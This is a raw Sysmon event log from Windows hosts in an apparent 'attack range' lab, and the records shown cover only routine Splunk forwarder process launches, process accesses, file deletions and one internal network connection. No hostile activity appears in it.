11:13:19.308{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-16CF-6216-0E07-000000003802}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.308{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-16CF-6216-0E07-000000003802}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.309{C8EA50B7-16CF-6216-0E07-000000003802}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.155{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A23C1D643CC1E3F48E2F753F7CA89A7,SHA256=8D8EA5DB9E34CEFBC73F9C1BDBF10A0758100BF90626CB288B9FFB4AA1318EEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220784Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:20.948{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E5A77676CC29628DF167A488FEC68C2,SHA256=22FC260A6460BF1301BD94C58F2499AD5D8E066104EE851DC14DC8AE4C4354BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.860{C8EA50B7-16D0-6216-1007-000000003802}58966336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.844{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8910FAC97214F7A508CA4C64DCD893A7,SHA256=74592FC0F5B15B1676B0D45F42BA862078FB068BE7353C7C5B1E431478CB5103,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.844{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8AF20E083F786B6EAF3885D36CF340DA,SHA256=F7C1E0E0F97D8E686F3730D97E6E8B9DF1E51D2B7C3AF5311EB7F87582CC0CC1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.605{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-16D0-6216-1007-000000003802}5896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.605{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.605{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.605{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-16D0-6216-1007-000000003802}5896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.605{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.605{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.605{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-16D0-6216-1007-000000003802}5896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.607{C8EA50B7-16D0-6216-1007-000000003802}5896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000296856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.205{C8EA50B7-16CF-6216-0F07-000000003802}19967140C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.174{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFA77B61C3BCA3873C680552FAB79AFF,SHA256=7831B167C95FB50D0E7D7ED52B3ACA0CAA39DB76006BA0F8B7D5F2471CEC04F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:21.174{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=387588A8E7AF7B0DA27A4FB54DEDDB5E,SHA256=93270A19B3567884F1A96DC33E19E2EF9039C68F55D9A1826EBE846973D1B6AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:21.105{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-16D1-6216-1107-000000003802}1804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:21.105{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:21.105{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:21.105{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:21.105{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:21.105{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-16D1-6216-1107-000000003802}1804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:21.105{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-16D1-6216-1107-000000003802}1804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:21.107{C8EA50B7-16D1-6216-1107-000000003802}1804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220785Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:22.151{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=060AFAFF54D814DBADB2F5A253D6CEED,SHA256=FB325FA26BC7F362421455D0521D38A678839A8612F3DAC685CB7655F691EF16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:22.175{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA30860E2FE2190D100DCA9C85EED75B,SHA256=117DF40A0B3E84ECDD16E56AF0D9F1F69847181AC5EB23B09726420A0D896690,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220786Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:23.370{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=758B9301D1D46579981FD26EF8657669,SHA256=65D6B319BAD1E2A1DCA8B0AAA9590A597D43BF72BB1DD1AF1C4DD580739DF678,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:20.734{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49391-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:23.206{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38310A2601BF624FC3B09603170F02F0,SHA256=FE4CC2D075C66FC5BD1574C83AC3D316F7BC1091F641A15576CCCCEE50000F6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:24.222{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8126307FAE7D01B93F91C45A00AD2ABA,SHA256=079FD7B98F6C444138600D6E7EA4B5CB6515A7804097608C9DAE7DBF036DC180,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220787Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:24.401{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6540B301071963683766C7D5E7FCBD27,SHA256=F833EC60EBF5E1EB2ACFBDF107BDA8333E7E4E7D3FBACFE848345E83830F2A70,IMPHASH=00000000000000000000000000000000falsetrue 